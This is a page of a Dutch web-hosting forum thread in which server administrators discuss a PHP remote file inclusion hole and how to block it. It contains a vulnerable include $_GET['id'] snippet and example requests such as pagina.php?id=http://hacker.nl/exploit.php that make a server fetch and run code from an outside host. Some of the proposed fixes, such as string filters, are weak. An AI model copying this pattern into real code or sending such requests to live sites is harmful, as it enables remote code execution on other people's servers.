Likes Likes:  0
Resultaten 1 tot 15 van de 36
Pagina 1 van de 3 1 2 3 LaatsteLaatste
Geen
  1. #1
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    4.048 Berichten
    Ingeschreven
    24/01/03

    Locatie
    London, United Kingdom, United Kingdom

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    9 Berichten zijn liked


    Naam: Dennis Arslan
    Bedrijf: Rackspace
    Functie: Linux Server Specialist
    URL: www.dennisarslan.com
    Registrar SIDN: ja
    KvK nummer: 04070212
    Ondernemingsnummer: nvt
    TrustCloud: DennisArslan
    View dennisarslan's profile on LinkedIn

    Thread Starter

    Externe PHP-code blokkeren?

    Ik ben weer bezig met security en zie onveiligheden is bijvoorbeeld dit script.

    pagina.php
    Code:
    <?php
    include $_GET['id'];
    ?>
    pagina.php?id=http://www.dennis.nl/25.gif

    Hij voert dan gewoon de php-code uit die in 25.gif staat... (25.gif = text-file)

    Server draait op PHP 4.3.10 met Safe_Mode enabled. Is zoiets te beveiligen?

  2. #2
    Externe PHP-code blokkeren?
    Actieve deelnemer
    1.249 Berichten
    Ingeschreven
    15/04/03

    Locatie
    Enschede

    Post Thanks / Like
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    5 Berichten zijn liked


    Bedrijf: Antagonist / Patchman
    Functie: CEO
    Registrar SIDN: ja
    KvK nummer: 09136441

    Ja, allow_url_fopen op off zetten.

  3. #3
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    4.048 Berichten
    Ingeschreven
    24/01/03

    Locatie
    London, United Kingdom, United Kingdom

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    9 Berichten zijn liked


    Naam: Dennis Arslan
    Bedrijf: Rackspace
    Functie: Linux Server Specialist
    URL: www.dennisarslan.com
    Registrar SIDN: ja
    KvK nummer: 04070212
    Ondernemingsnummer: nvt
    TrustCloud: DennisArslan
    View dennisarslan's profile on LinkedIn

    Thread Starter
    Hebben jullie dit allemaal op off?

    *EDIT*
    Dit staat standaard aan bij een kale server-install. Dit staat na de Plesk/DirectAdmin/cPanel-installatie nog aan. Dit staat na de Zend-installatie nog aan... waarom zetten zij het dan niet uit?
    Laatst gewijzigd door Dennis; 29/01/05 om 15:36.

  4. #4
    Externe PHP-code blokkeren?
    The anonymous BOFH
    665 Berichten
    Ingeschreven
    28/06/04

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nvt
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    maar globaal zet je zoiets beter niet aan, want er zijn verschillende prefab scripts die ftp:// of http:// gebruiken.

  5. #5
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    4.048 Berichten
    Ingeschreven
    24/01/03

    Locatie
    London, United Kingdom, United Kingdom

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    9 Berichten zijn liked


    Naam: Dennis Arslan
    Bedrijf: Rackspace
    Functie: Linux Server Specialist
    URL: www.dennisarslan.com
    Registrar SIDN: ja
    KvK nummer: 04070212
    Ondernemingsnummer: nvt
    TrustCloud: DennisArslan
    View dennisarslan's profile on LinkedIn

    Thread Starter
    Origineel geplaatst door wv-
    maar globaal zet je zoiets beter niet aan, want er zijn verschillende prefab scripts die ftp:// of http:// gebruiken.
    Globaal (php.ini) kun je het beter op off zetten? Zie mijn edit ook in vorige bericht.

  6. #6
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    218 Berichten
    Ingeschreven
    17/10/02

    Locatie
    Bunnik

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: 30171529
    Ondernemingsnummer: nvt

    Dat is ook niet de juiste methode. Je moet die $_GET['id'] liefst even matchen met een regular expression ofzo om ook zeker te weten dat 'ie niet begint met bv. "/" of "../". Als je 'm zou matchen met bv. "'^[a-z0-9]\.php$'i" ben je al een heel eind.

  7. #7
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    4.048 Berichten
    Ingeschreven
    24/01/03

    Locatie
    London, United Kingdom, United Kingdom

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    9 Berichten zijn liked


    Naam: Dennis Arslan
    Bedrijf: Rackspace
    Functie: Linux Server Specialist
    URL: www.dennisarslan.com
    Registrar SIDN: ja
    KvK nummer: 04070212
    Ondernemingsnummer: nvt
    TrustCloud: DennisArslan
    View dennisarslan's profile on LinkedIn

    Thread Starter
    Origineel geplaatst door Hans
    Dat is ook niet de juiste methode. Je moet die $_GET['id'] liefst even matchen met een regular expression ofzo om ook zeker te weten dat 'ie niet begint met bv. "/" of "../". Als je 'm zou matchen met bv. "'^[a-z0-9]\.php$'i" ben je al een heel eind.
    In je PHP-code ja... maar ik wil dit security-concern graag voor mijn klanten oplossen...

  8. #8
    Externe PHP-code blokkeren?
    The anonymous BOFH
    665 Berichten
    Ingeschreven
    28/06/04

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nvt
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Standaard op aan. De meeste klanten gaan het lastig vinden dat dit op "af" zou staan als ze een of ander scriptje willen installeren.

    Wij laten dit aan staan, maar de klant heeft wel de mogelijkheid een eigen php.ini te zetten in elke web directory. Dit maakt het natuurlijk goed.

    Ook moet jij eigenlijk niet inzitten met slechte scripts, die zullen er altijd wel zijn. Zorg gewoon dat indien een website gehackt wordt, de kraker niet verder geraakt dan die klant. Anders ga je de meer advanced php scripters afweren door alle limitaties die je toe past voor de klanten die er niks van kennen.

    offtopic: Als jouw server op safe-mode staat, hoe kunnen jouw klanten dan bijvoorbeeld Gallery / grote CMS'n / ... draaien?

  9. #9
    Externe PHP-code blokkeren?
    Banned
    323 Berichten
    Ingeschreven
    26/11/03

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Zoals wv- aangeeft is eigenlijk het slimste de server gewoon te beveiligen dmv eigen dirs, en niet meer.

    Dit soort scripts zijn gewoon slecht (eigenlijk in hoofdletters).

    Ik vrees dat PHP dit soort dingen niet zelf beveiligd met een methode.

    Eerder in deze thread werd "allow_url_fopen" aangeraden om uit te zetten, leuk maar daar is het niet voor.
    This option enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol ... etc
    Bron

    Geldt dus niet voor je lokale files, want die zijn niet remote je include code blijft gewoon zo.

  10. #10
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    4.048 Berichten
    Ingeschreven
    24/01/03

    Locatie
    London, United Kingdom, United Kingdom

    Post Thanks / Like
    Mentioned
    7 Post(s)
    Tagged
    0 Thread(s)
    9 Berichten zijn liked


    Naam: Dennis Arslan
    Bedrijf: Rackspace
    Functie: Linux Server Specialist
    URL: www.dennisarslan.com
    Registrar SIDN: ja
    KvK nummer: 04070212
    Ondernemingsnummer: nvt
    TrustCloud: DennisArslan
    View dennisarslan's profile on LinkedIn

    Thread Starter
    Jawel, maar dan zou je niets meer van buiten kunnen include. Je kunt dan geen externe php-code includen die alsnog wordt uitgevoerd.

    Ik denk dat jullie gelijk hebben. Deze bug pagina.php?id=http://hacker.nl/exploit.php valt gewoon niet te verhelpen als webhost.

    allow_url_fopen uitzetten is geen optie. Daarmee beperk je je klanten ernstig.

    Helaas... PHP-security has failed again

  11. #11
    Externe PHP-code blokkeren?
    SanBax
    1.118 Berichten
    Ingeschreven
    11/04/04

    Locatie
    Den Haag

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    Ondernemingsnummer: nvt

    ik haal meestal met str_replace de http:// en dergelijke weg.

  12. #12
    Externe PHP-code blokkeren?
    Hangt wat rond
    441 Berichten
    Ingeschreven
    08/06/03

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Je kunt met mod_security filteren op zaken als; http:// of ftp:// dan hoef je ook al die zaken niet in de php configuratie aan te passen, naar mijn idee de beste oplossing voor jouw geval dennis.

    Zaken als pagina.php?id=http://hacker.nl/exploit.php
    worden dan niet toegelaten aangezien mod_security de http:// herkent als je daarop filtert en dus de betreffende request niet execute.

  13. #13
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    403 Berichten
    Ingeschreven
    20/10/03

    Locatie
    Nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: Nvt
    Ondernemingsnummer: nvt

    En? gebruik ik toch gewoon ftp://, gopher, etc.

    Kwestie is relatief simpel:

    a) php zo beveiligen dat alle klanten beperkingen hebben
    b) zorgen dat alle gebruikers afgezonderd zijn

  14. #14
    Externe PHP-code blokkeren?
    geregistreerd gebruiker
    403 Berichten
    Ingeschreven
    20/10/03

    Locatie
    Nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: Nvt
    Ondernemingsnummer: nvt

    Origineel geplaatst door Mog
    Je kunt met mod_security filteren op zaken als; http:// of ftp:// dan hoef je ook al die zaken niet in de php configuratie aan te passen, naar mijn idee de beste oplossing voor jouw geval dennis.

    Zaken als pagina.php?id=http://hacker.nl/exploit.php
    worden dan niet toegelaten aangezien mod_security de http:// herkent als je daarop filtert en dus de betreffende request niet execute.
    maar daarmee fix je dit niet:

    fopen('http://'.$_GET['url']);

    url: page.php?url=/domain.nl/file.ext

    Bottomline, je moet het niet moeilijk maken voor hackers om exploits te gebruiken maar onmogelijk

  15. #15
    Externe PHP-code blokkeren?
    Hangt wat rond
    441 Berichten
    Ingeschreven
    08/06/03

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Origineel geplaatst door roland
    maar daarmee fix je dit niet:

    fopen('http://'.$_GET['url']);

    url: page.php?url=/domain.nl/file.ext
    Dan filter je op ".nl" en een hele meuk aan andere extensies er ook nog eens bij, dan is je probleem opgelost in bijna alle gevallen.
    Want met enkel fopen uitzetten ben je er nog lang niet, er zijn tal van manieren om externe files via php te executen.
    Daarnaast zoals je zelf ook al aangeeft met een chrooted omgeving werken en met voorkeur een php cli versie dus.
    Laatst gewijzigd door Mog; 29/01/05 om 22:32.

Pagina 1 van de 3 1 2 3 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics